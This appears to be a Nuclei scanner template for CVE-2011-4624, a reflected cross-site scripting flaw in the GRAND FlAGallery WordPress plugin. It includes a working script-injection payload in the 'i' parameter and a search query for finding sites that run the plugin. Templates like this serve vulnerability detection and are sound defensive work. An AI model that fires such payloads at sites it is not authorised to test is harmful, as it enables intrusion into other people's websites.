52 lines
2.0 KiB
YAML
52 lines
2.0 KiB
YAML
id: CVE-2011-4624
|
|
|
|
info:
|
|
name: GRAND FlAGallery 1.57 - Cross-Site Scripting
|
|
author: daffainfo
|
|
severity: medium
|
|
description: A cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
|
|
remediation: Upgrade to the latest version to mitigate this vulnerability.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2011-4624
|
|
- http://www.openwall.com/lists/oss-security/2011/12/23/2
|
|
- http://plugins.trac.wordpress.org/changeset/469785
|
|
- http://wordpress.org/extend/plugins/flash-album-gallery/changelog/
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
|
|
cvss-score: 4.3
|
|
cve-id: CVE-2011-4624
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00431
|
|
epss-percentile: 0.7165
|
|
cpe: cpe:2.3:a:codeasily:grand_flagallery:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: codeasily
|
|
product: grand_flagallery
|
|
framework: wordpress
|
|
google-query: inurl:"/wp-content/plugins/flash-album-gallery"
|
|
tags: cve,cve2011,wordpress,xss,wp-plugin,codeasily
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100e48c760facc10875f3b22aa4b2e7261cb9d94dbddc3bb83656766cfd3ae573d2022100cc1e13347644fd3ab565397b42e4b833231009c21c579f4ad5b936e3f8fa3f53:922c64590222798bb761d5b6d8e72950 |